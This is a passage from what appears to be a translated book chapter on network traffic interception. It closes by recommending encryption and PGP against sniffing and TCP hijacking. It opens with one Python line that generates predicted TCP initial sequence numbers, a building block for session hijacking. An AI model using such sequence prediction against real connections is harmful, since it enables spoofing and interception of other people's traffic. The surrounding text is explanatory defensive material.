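    return [gen.next_isn(("10.0.0.2", 40000 + i), server, i * clock_step) for i in range(n)]
```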

    All this is very interesting, but practical results of this kind of research are not yet visible. Therefore, we advise everyone who wants to delve deeper into this topic to turn to the book from which the information presented above was mainly taken.

    Conclusion

    Intercepting network data is the most effective method of network hacking, allowing a hacker to obtain almost all the information circulating on the network. Sniffing tools, i.e. tools for listening to the network, have seen the greatest practical development; nevertheless, one cannot ignore the methods that intercept network data by interfering with the normal functioning of the network in order to redirect traffic to a hacker host, especially the methods of intercepting TCP connections. In practice, however, these latter methods have not yet been sufficiently developed and need to be improved.

    An anti-hacker should know that the only salvation from data interception is encryption, i.e. cryptographic protection methods. When sending a message over the network, you should assume in advance that the network's cable system is completely vulnerable and that any hacker connected to the network will be able to capture every secret message transmitted over it. There are two technologies for solving this problem: building a VPN and encrypting the messages themselves. All these tasks are very easy to solve using the PGP Desktop Security software package (its description can be found, for example, in).
